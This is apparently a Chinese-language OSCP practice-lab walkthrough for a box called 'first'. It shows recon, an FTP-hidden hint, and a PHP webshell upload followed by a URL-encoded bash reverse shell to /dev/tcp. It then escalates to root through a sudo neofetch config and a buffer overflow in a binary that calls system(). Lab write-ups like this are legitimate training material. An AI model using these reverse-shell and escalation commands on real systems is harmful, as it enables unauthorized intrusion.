【OSCP】first

OSCP 靶场

靶场介绍

信息收集

主机发现

nmap -sn 192.168.1.0/24

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.43 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-20 23:41 EST
Nmap scan report for 192.168.1.43
Host is up (0.00073s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 0        0            4096 Aug 09  2022 fifth
| drwxr-xr-x    2 0        0            4096 Aug 10  2022 first
| drwxr-xr-x    2 0        0            4096 Aug 09  2022 fourth
| drwxr-xr-x    2 0        0            4096 Aug 09  2022 seccond
|_drwxr-xr-x    2 0        0            4096 Aug 09  2022 third
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.129
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b8:57:5b:81:5a:78:1f:d6:ff:60:39:bb:32:a8:5d:cd (RSA)
|   256 65:8d:43:ec:63:77:d0:39:c0:1b:3e:40:d9:53:1e:ed (ECDSA)
|_  256 0f:02:ac:df:e1:31:3c:b2:59:f6:b7:59:09:f1:ff:f8 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:1F:16:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.73 ms 192.168.1.43

目录扫描

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.1.43 -x html,php,txt -e 

权限获取

ftp 可以匿名访问，我们从ftp 中获取图片，读取隐写信息

┌──(root㉿kali)-[~]
└─# echo "SGkgSSBoYWQgdG8gY2hhbmdlIHRoZSBuYW1lIG9mIHRoZSB0b2RvIGxpc3QgYmVjb3VzZSBkaXJlY3RvcnkgYnVzdGluZyBpcyB0b28gZWFzeSB0aGVlc2UgZGF5cyBhbHNvIEkgZW5jb2RlZCB0aGlzIGluIGJlc2E2NCBiZWNvdXNlIGl0IGlzIGNvb2wgYnR3IHlvdXIgdG9kbyBsaXN0IGlzIDogMmYgNzQgMzAgNjQgMzAgNWYgNmMgMzEgNzMgNzQgNWYgNjYgMzAgNzIgNWYgNjYgMzEgNzIgMzUgNzQgZG8gaXQgcXVpY2sgd2UgYXJlIHZ1bG5hcmFibGUgZG8gdGhlIGZpcnN0IGZpcnN0IA==" | base64 -d

Hi I had to change the name of the todo list becouse directory busting is too easy theese days also I encoded this in besa64 becouse it is cool btw your todo list is : 2f 74 30 64 30 5f 6c 31 73 74 5f 66 30 72 5f 66 31 72 35 74 do it quick we are vulnarable do the first first             

对十六进制 进行解码

2f 74 30 64 30 5f 6c 31 73 74 5f 66 30 72 5f 66 31 72 35 74

得到待办清单

再次扫描目录，获取文件上传接口

直接上传webshell

http://192.168.1.43/t0d0_l1st_f0r_f1r5t/uploads/1.php?cmd=bash+-c+%27bash+-i+%3E%26/dev/tcp/192.168.1.129/8989+0%3E%261%27

python3 -c 'import pty;pty.spawn("/bin/bash")'
或者
script /dev/null -c bash

Ctrl + Z
stty raw -echo ;fg
stty rows 38 columns 116
export TERM=xterm

权限提升

sudo 查看考first 用户使用neofetch 不用密码

https://gtfobins.github.io/gtfobins/neofetch/

www-data@first:/tmp$ cat $TF                                 
exec /bin/sh
www-data@first:/tmp$ echo "exec /bin/sh" > shell
www-data@first:/tmp$ sudo -u first /bin/neofetch --config ./shell 
$ id
uid=1000(first) gid=1000(first) groups=1000(first),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
$ whoami
first
$ script /dev/null -c bash
Script started, file is /dev/null
first@first:/tmp$ ls
shell  tmp.0cm8LMj6Sc  tmp.DiFT6Jhhi4
first@first:/tmp$ 

再次查看sudo，发现如下程序不需要密码可以执行。执行后需要密码。

irst@first:/tmp$ sudo -l
Matching Defaults entries for first on first:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User first may run the following commands on first:
    (ALL) NOPASSWD: /bin/secret

cd /tmp/secret /tmp
python3 -m http.server
wget http://192.168.1.43:8000/secret 

file 查看是elf 文件，我们下载后使用ida 进行反编译。

这里可以看到local_c != 0为真时，进入system 函数。local_16 变量的长度为10个字符。这和之前缓冲区溢出的提示关联在一起了。因此我们直接超过10个字符使用缓冲区溢出成功提权到root权限。

undefined8 main(void)

{
  char local_88 [114];
  char local_16 [10];
  int local_c;
  
  std::operator<<((basic_ostream *)std::cout,"pass: ");
  local_c = 0;
  std::operator>>((basic_istream *)std::cin,local_16);
  if (local_c == 0) {
    std::operator<<((basic_ostream *)std::cout,"wrong");
  }
  else {
    std::operator<<((basic_ostream *)std::cout,"correct, input command:");
    std::operator>>((basic_istream *)std::cin,local_88);
    system(local_88);
  }
  return 0;
}

原文始发于微信公众号（贝雷帽SEC）：【OSCP】first